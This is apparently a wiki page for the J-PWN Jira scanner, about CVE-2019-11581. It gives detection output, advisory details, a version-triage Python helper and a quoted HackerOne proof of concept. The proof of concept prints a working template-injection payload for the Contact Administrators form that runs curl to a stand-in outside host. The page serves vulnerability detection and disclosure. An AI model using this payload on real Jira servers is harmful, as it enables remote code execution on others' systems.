CVE-2019-11581 - carnal0wnage/J-PWN GitHub Wiki
CVE-2019-11581
Category: [RCE]
module name: check_cve_2019_11581
url: secure/ContactAdministrators!default.jspa
+ [Potential RCE] - CVE-2019-11581 Detected - The contact form is configured and potential vulnerable [MANUAL REVIEW REQUIRED]
URL: https://JIRASERVER/jira/secure/ContactAdministrators!default.jspa
Note: Exploitation requires manual steps.
Note: For this issue to be exploitable at least one of the following conditions must be met:
1. An SMTP server has been configured in Jira and the Contact Administrators Form is enabled
2. or an SMTP server has been configured in Jira and an attacker has "JIRA Administrators" access.
Note:Refer to: https://jira.atlassian.com/browse/JRASERVER-69532 && https://hackerone.com/reports/706841
[CG] What a true positive may look like:
Description
There was a server-side template injection vulnerability in Jira Server and Data Center, in the ContactAdministrators and the SendBulkMail actions. For this issue to be exploitable at least one of the following conditions must be met:
- an SMTP server has been configured in Jira and the Contact Administrators Form is enabled; or
- an SMTP server has been configured in Jira and an attacker has "JIRA Administrators" access.
In the first case, where the Contact Administrators Form is enabled, attackers are able to exploit this issue without authentication. In the second case, attackers with "JIRA Administrators" access can exploit this issue. In either case, successful exploitation of this issue allows an attacker to remotely execute code on systems that run a vulnerable version of Jira Server or Data Center.
Affected versions:
All versions of Jira Server and Data Center from 4.4.0 before 7.6.14, from 7.7.0 before 7.13.5, from 8.0.0 before 8.0.3, from 8.1.0 before 8.1.2, and from 8.2.0 before 8.2.3 are affected by this vulnerability.
ref: https://jira.atlassian.com/browse/JRASERVER-69532
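As an added example (not J-PWN's own code), the affected-version ranges and the two preconditions from the advisory above turned into a triage helper; the function names and verdict strings are my own.

```python
# Added example: not J-PWN's module code. Maps the advisory's affected-version
# ranges onto a parsed Jira version string and combines that with the listed
# preconditions (SMTP configured, plus either the public Contact Administrators
# form or "JIRA Administrators" access).
import re
from typing import List, Tuple

# (first affected, first fixed) per branch, copied from the advisory text.
AFFECTED_RANGES: List[Tuple[Tuple[int, ...], Tuple[int, ...]]] = [
    ((4, 4, 0), (7, 6, 14)),
    ((7, 7, 0), (7, 13, 5)),
    ((8, 0, 0), (8, 0, 3)),
    ((8, 1, 0), (8, 1, 2)),
    ((8, 2, 0), (8, 2, 3)),
]


def parse_version(version: str) -> Tuple[int, ...]:
    """Turn '8.2.3' (or '8.2', or '8.2.3-beta') into a 3-part integer tuple."""
    nums: List[int] = []
    for part in version.strip().split(".")[:3]:
        match = re.match(r"\d+", part)  # stop at the first non-numeric component
        if not match:
            break
        nums.append(int(match.group()))
    if not nums:
        raise ValueError(f"unparseable Jira version: {version!r}")
    return tuple(nums + [0] * (3 - len(nums)))


def is_affected_version(version: str) -> bool:
    """True if the version lies in any [first affected, first fixed) range."""
    v = parse_version(version)
    return any(low <= v < fixed for low, fixed in AFFECTED_RANGES)


def exposure(version: str, smtp_configured: bool,
             contact_form_enabled: bool, admin_access: bool) -> str:
    """Verdict following the advisory's preconditions, most exposed case first."""
    if not is_affected_version(version):
        return "not affected: fixed or out-of-range version"
    if not smtp_configured:
        return "affected version, but not exploitable without an SMTP server"
    if contact_form_enabled:
        return "exploitable unauthenticated via the Contact Administrators form"
    if admin_access:
        return "exploitable only with JIRA Administrators access"
    return "affected version with SMTP set, but no listed entry point reachable"
```

Pair the verdict with a check of whether ContactAdministrators!default.jspa actually renders the form, since a patched version or a disabled form closes the unauthenticated path.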
from https://hackerone.com/reports/706841
Summary
I found the domain my-com.atlassian.net is vulnerable to RCE in Jira (CVE-2019-11581) via the contact admin function.
PoC
- on page
https://my-com.atlassian.net/secure/ContactAdministrators!default.jspa
- use the payload in Subject & Request details
$i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec('curl http://your_server_here/rcetest?a=a').waitFor()
Then I immediately received a bunch of curl callbacks on my host from 185.6.245.156, which confirmed the vulnerability.
Impact
Command Injection and RCE
Other refs: